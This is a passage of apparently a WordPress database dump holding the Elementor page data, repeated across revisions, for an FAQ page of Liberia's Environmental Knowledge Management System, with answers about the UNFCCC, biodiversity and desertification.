the\\u00a0<a href=\\\"https:\\/\\/onlinereg.unfccc.int\\/\\\">online registration system<\\/a>\\u00a0(ORS). Please see the\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/overview\\\" target=\\\"_self\\\">civil society<\\/a>\\u00a0web page for more information.<\\/p><\\/li><li><p><strong>Observer<\\/strong>\\u00a0from a United Nations organization or specialized agency. Nominations are received from the respective organization.<\\/p><\\/li><li><p><strong>Member of the press<\\/strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/press\\/calender_of_events\\/accreditation\\/items\\/2987.php\\\">accreditation section<\\/a>.<\\/p><\\/li><\\/ol>\",\"_id\":\"34ce7e2\"},{\"tab_title\":\"What is the purpose of the UNFCCC?\",\"tab_content\":\"<p>The\\u00a0UN Framework Convention on Climate Change\\u00a0(UNFCCC) is an intergovernmental treaty developed to address the problem of\\u00a0climate change.<\\/p>\",\"_id\":\"5364766\"},{\"tab_title\":\"What is climate neutrality?\",\"tab_content\":\"<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth\'s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.<\\/p>\",\"_id\":\"2cf3095\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"034d9e3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f12a46\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"00a6661\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e527259\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCBD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e0f30fd\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the UNCBD?\",\"tab_content\":\"<p>The\\u00a0Convention on Biological Diversity\\u00a0(CBD)\\u00a0is\\u00a0an international legally-binding treaty with three main goals: conservation of\\u00a0biodiversity; sustainable use of\\u00a0biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.<\\/p>\",\"_id\":\"76b731c\"},{\"tab_title\":\"What is conservation of biodiversity?\",\"tab_content\":\"<p>Conservation of biological diversity\\u00a0leads to\\u00a0conservation\\u00a0of essential ecological\\u00a0diversity\\u00a0to preserve the continuity of food chains. The genetic\\u00a0diversity\\u00a0of plants and animals is preserved. Biodiversity conservation\\u00a0serves as an insurance policy for the future.<\\/p>\",\"_id\":\"fc56846\"},{\"tab_title\":\"What is the need of conducting a biodiversity meet?\",\"tab_content\":\"<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.<\\/p>\",\"_id\":\"1c0b9e0\"},{\"tab_title\":\"How can we protect and preserve biodiversity?\",\"tab_content\":\"<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and\\u00a0protect\\u00a0beaches, parks, reserves, and fields where wild plants and animals live.<\\/p>\",\"_id\":\"b0638cd\"},{\"tab_title\":\"What are some factors that affect biodiversity?\",\"tab_content\":\"<p>The loss of\\u00a0biodiversity affects the lives of more than 1 billion people living in dry lands.<br \\/>5 major threats to biodiversity;<br \\/>Climate change<br \\/>Deforestation and habitat loss<br \\/>Over-exploitation<br \\/>Invasive species<br \\/>Pollution<\\/p>\",\"_id\":\"45db245\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e9a9393\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f33106f\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"81f02fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"971e22b\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCCD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fefb411\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the importance of the UNCCD?\",\"tab_content\":\"<p>The\\u00a0United Nations Convention to Combat Desertification\\u00a0in Those\\u00a0Countries\\u00a0Experiencing Serious Drought and\\/or\\u00a0Desertification, Particularly in Africa (UNCCD) is a\\u00a0Convention to combat desertification\\u00a0and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by\\u00a0<span style=\\\"color: #222222; font-family: georgia, palatino, serif; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;\\\">international cooperation and partnership arrangements.<\\/span><\\/p>\",\"_id\":\"9661246\"},{\"tab_title\":\"Is the UNCCD legally binding?\",\"tab_content\":\"<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management<\\/p>\",\"_id\":\"da9b208\"},{\"tab_title\":\"What is desertification?\",\"tab_content\":\"<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.<\\/p>\",\"_id\":\"c71b5f6\"},{\"tab_title\":\"Why is it important to combat desertification?\",\"tab_content\":\"<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land\'s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined - are at risk of being displaced as a consequence of desertification.<\\/p>\",\"_id\":\"1275d06\"},{\"tab_title\":\"Is desertification a global problem?\",\"tab_content\":\"<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth\'s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world\'s poorest in over one hundred countries are threatened.<\\/p>\",\"_id\":\"0f255fe\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false}]'),(16837,2524,'_wp_page_template','default'),(16838,2524,'_elementor_edit_mode','builder'),(16839,2524,'_elementor_template_type','wp-page'),(16840,2524,'_elementor_version','2.7.5'),(16841,2524,'_elementor_data','[{\"id\":\"81604c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"635073e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"20a0238\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"heading_color\":\"#196819\",\"color_text\":\"#000000\",\"color_link_hover\":\"#114511\"},\"elements\":[{\"id\":\"3b455ed\",\"elType\":\"widget\",\"settings\":{\"title\":\"GENERAL \",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c396810\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the EKMS?\",\"tab_content\":\"<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other\\u00a0 Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.<\\/p><p>It focuses on how the Rio conventions are being implementation in Liberia.<\\/p>\",\"_id\":\"eb92a21\"},{\"tab_title\":\"Who can contribute to the EKMS?\",\"tab_content\":\"<p>Government Institutions, International and National NGOs that have direct linkages with environmental policies and development, are invited to join the EKMS team. Interested individuals could also submit useful data to the EKMS. Please see our institutions resources to know which institutions are currently participating.<\\/p>\",\"_id\":\"044d49e\"},{\"tab_title\":\"How can i discussion on topics?\",\"tab_content\":\"<p>Join our community forum for free, if you are interested in discussing issues indepth. You can also share discussed topics with your own Facebook groups, on Twitter, or Linkedin. Thank you.<\\/p>\",\"_id\":\"bc9c821\"}],\"icon_color\":\"#000000\",\"content_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49d848d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"396f528\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"30a8e68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3d1091e\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNFCCC\",\"title_color\":\"#126b37\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2aefce2\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"When should I accredit myself for UNFCCC meetings?\",\"tab_content\":\"<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.<\\/p>\",\"_id\":\"a4d8544\"},{\"tab_title\":\"I want to get graphs and data about climate change. What is available and can I use it?\",\"tab_content\":\"<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.<\\/p>\",\"_id\":\"3148a01\"},{\"tab_title\":\"Are UNFCCC meetings open to the general public?\",\"tab_content\":\"<p>No, each participant must be properly accredited and registered.<\\/p>\",\"_id\":\"872f5c5\"},{\"tab_title\":\"Who can participate in UNFCCC meetings and how do they accredit themselves?\",\"tab_content\":\"<p>There are different participation groups at UNFCCC meetings; these include:<\\/p><ol><li><p><strong>Government delegate<\\/strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and\\/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/parties_observers\\/parties\\/national_focal_points\\/items\\/9336.php\\\">National Focal Point<\\/a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.<\\/p><\\/li><li><p><strong>Observers<\\/strong>\\u00a0from admitted\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-ngos\\\" target=\\\"_self\\\">non-governmental<\\/a>\\u00a0or\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-igos\\\" target=\\\"_self\\\">intergovernmental<\\/a>\\u00a0organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the\\u00a0<a href=\\\"https:\\/\\/onlinereg.unfccc.int\\/\\\">online registration system<\\/a>\\u00a0(ORS). Please see the\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/overview\\\" target=\\\"_self\\\">civil society<\\/a>\\u00a0web page for more information.<\\/p><\\/li><li><p><strong>Observer<\\/strong>\\u00a0from a United Nations organization or specialized agency. Nominations are received from the respective organization.<\\/p><\\/li><li><p><strong>Member of the press<\\/strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/press\\/calender_of_events\\/accreditation\\/items\\/2987.php\\\">accreditation section<\\/a>.<\\/p><\\/li><\\/ol>\",\"_id\":\"34ce7e2\"},{\"tab_title\":\"What is the purpose of the UNFCCC?\",\"tab_content\":\"<p>The\\u00a0UN Framework Convention on Climate Change\\u00a0(UNFCCC) is an intergovernmental treaty developed to address the problem of\\u00a0climate change.<\\/p>\",\"_id\":\"5364766\"},{\"tab_title\":\"What is climate neutrality?\",\"tab_content\":\"<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth\'s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.<\\/p>\",\"_id\":\"2cf3095\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"034d9e3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f12a46\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"00a6661\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e527259\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCBD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e0f30fd\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the UNCBD?\",\"tab_content\":\"<p>The\\u00a0Convention on Biological Diversity\\u00a0(CBD)\\u00a0is\\u00a0an international legally-binding treaty with three main goals: conservation of\\u00a0biodiversity; sustainable use of\\u00a0biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.<\\/p>\",\"_id\":\"76b731c\"},{\"tab_title\":\"What is conservation of biodiversity?\",\"tab_content\":\"<p>Conservation of biological diversity\\u00a0leads to\\u00a0conservation\\u00a0of essential ecological\\u00a0diversity\\u00a0to preserve the continuity of food chains. The genetic\\u00a0diversity\\u00a0of plants and animals is preserved. Biodiversity conservation\\u00a0serves as an insurance policy for the future.<\\/p>\",\"_id\":\"fc56846\"},{\"tab_title\":\"What is the need of conducting a biodiversity meet?\",\"tab_content\":\"<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.<\\/p>\",\"_id\":\"1c0b9e0\"},{\"tab_title\":\"How can we protect and preserve biodiversity?\",\"tab_content\":\"<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and\\u00a0protect\\u00a0beaches, parks, reserves, and fields where wild plants and animals live.<\\/p>\",\"_id\":\"b0638cd\"},{\"tab_title\":\"What are some factors that affect biodiversity?\",\"tab_content\":\"<p>The loss of\\u00a0biodiversity affects the lives of more than 1 billion people living in dry lands.<br \\/>5 major threats to biodiversity;<br \\/>Climate change<br \\/>Deforestation and habitat loss<br \\/>Over-exploitation<br \\/>Invasive species<br \\/>Pollution<\\/p>\",\"_id\":\"45db245\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e9a9393\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f33106f\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"81f02fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"971e22b\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCCD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fefb411\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the importance of the UNCCD?\",\"tab_content\":\"<p>The\\u00a0United Nations Convention to Combat Desertification\\u00a0in Those\\u00a0Countries\\u00a0Experiencing Serious Drought and\\/or\\u00a0Desertification, Particularly in Africa (UNCCD) is a\\u00a0Convention to combat desertification\\u00a0and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by\\u00a0<span style=\\\"color: #222222; font-family: georgia, palatino, serif; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;\\\">international cooperation and partnership arrangements.<\\/span><\\/p>\",\"_id\":\"9661246\"},{\"tab_title\":\"Is the UNCCD legally binding?\",\"tab_content\":\"<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management<\\/p>\",\"_id\":\"da9b208\"},{\"tab_title\":\"What is desertification?\",\"tab_content\":\"<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.<\\/p>\",\"_id\":\"c71b5f6\"},{\"tab_title\":\"Why is it important to combat desertification?\",\"tab_content\":\"<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land\'s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined - are at risk of being displaced as a consequence of desertification.<\\/p>\",\"_id\":\"1275d06\"},{\"tab_title\":\"Is desertification a global problem?\",\"tab_content\":\"<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth\'s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world\'s poorest in over one hundred countries are threatened.<\\/p>\",\"_id\":\"0f255fe\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false}]'),(16843,2525,'_wp_page_template','default'),(16844,2525,'_elementor_edit_mode','builder'),(16845,2525,'_elementor_template_type','wp-page'),(16846,2525,'_elementor_version','2.7.5'),(16847,2525,'_elementor_data','[{\"id\":\"81604c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"635073e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"20a0238\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"heading_color\":\"#196819\",\"color_text\":\"#000000\",\"color_link_hover\":\"#114511\"},\"elements\":[{\"id\":\"3b455ed\",\"elType\":\"widget\",\"settings\":{\"title\":\"GENERAL \",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c396810\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the EKMS?\",\"tab_content\":\"<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other\\u00a0 Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.<\\/p><p>It focuses on how the Rio conventions are being implementation in Liberia.<\\/p>\",\"_id\":\"eb92a21\"},{\"tab_title\":\"Who can contribute to the EKMS?\",\"tab_content\":\"<p>Government Institutions, International and National NGOs that have direct linkages with environmental policies and development, are invited to join the EKMS team. Interested individuals could also submit useful data to the EKMS. Please see our institutions resources to know which institutions are currently participating.<\\/p>\",\"_id\":\"044d49e\"},{\"tab_title\":\"How can i discussion on topics?\",\"tab_content\":\"<p>Join our community forum for free, if you are interested in discussing issues indepth. You can also share discussed topics with your own group on Facebook, Twitter, or Linkedin. Thank you for your interest in the EKMS.<\\/p>\",\"_id\":\"bc9c821\"}],\"icon_color\":\"#000000\",\"content_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49d848d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"396f528\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"30a8e68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3d1091e\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNFCCC\",\"title_color\":\"#126b37\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2aefce2\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"When should I accredit myself for UNFCCC meetings?\",\"tab_content\":\"<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.<\\/p>\",\"_id\":\"a4d8544\"},{\"tab_title\":\"I want to get graphs and data about climate change. What is available and can I use it?\",\"tab_content\":\"<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.<\\/p>\",\"_id\":\"3148a01\"},{\"tab_title\":\"Are UNFCCC meetings open to the general public?\",\"tab_content\":\"<p>No, each participant must be properly accredited and registered.<\\/p>\",\"_id\":\"872f5c5\"},{\"tab_title\":\"Who can participate in UNFCCC meetings and how do they accredit themselves?\",\"tab_content\":\"<p>There are different participation groups at UNFCCC meetings; these include:<\\/p><ol><li><p><strong>Government delegate<\\/strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and\\/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/parties_observers\\/parties\\/national_focal_points\\/items\\/9336.php\\\">National Focal Point<\\/a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.<\\/p><\\/li><li><p><strong>Observers<\\/strong>\\u00a0from admitted\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-ngos\\\" target=\\\"_self\\\">non-governmental<\\/a>\\u00a0or\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-igos\\\" target=\\\"_self\\\">intergovernmental<\\/a>\\u00a0organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the\\u00a0<a href=\\\"https:\\/\\/onlinereg.unfccc.int\\/\\\">online registration system<\\/a>\\u00a0(ORS). Please see the\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/overview\\\" target=\\\"_self\\\">civil society<\\/a>\\u00a0web page for more information.<\\/p><\\/li><li><p><strong>Observer<\\/strong>\\u00a0from a United Nations organization or specialized agency. Nominations are received from the respective organization.<\\/p><\\/li><li><p><strong>Member of the press<\\/strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/press\\/calender_of_events\\/accreditation\\/items\\/2987.php\\\">accreditation section<\\/a>.<\\/p><\\/li><\\/ol>\",\"_id\":\"34ce7e2\"},{\"tab_title\":\"What is the purpose of the UNFCCC?\",\"tab_content\":\"<p>The\\u00a0UN Framework Convention on Climate Change\\u00a0(UNFCCC) is an intergovernmental treaty developed to address the problem of\\u00a0climate change.<\\/p>\",\"_id\":\"5364766\"},{\"tab_title\":\"What is climate neutrality?\",\"tab_content\":\"<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth\'s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.<\\/p>\",\"_id\":\"2cf3095\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"034d9e3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f12a46\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"00a6661\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e527259\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCBD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e0f30fd\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the UNCBD?\",\"tab_content\":\"<p>The\\u00a0Convention on Biological Diversity\\u00a0(CBD)\\u00a0is\\u00a0an international legally-binding treaty with three main goals: conservation of\\u00a0biodiversity; sustainable use of\\u00a0biodiversity; fair and equitable sharing of the benefits arising from the use of genetic 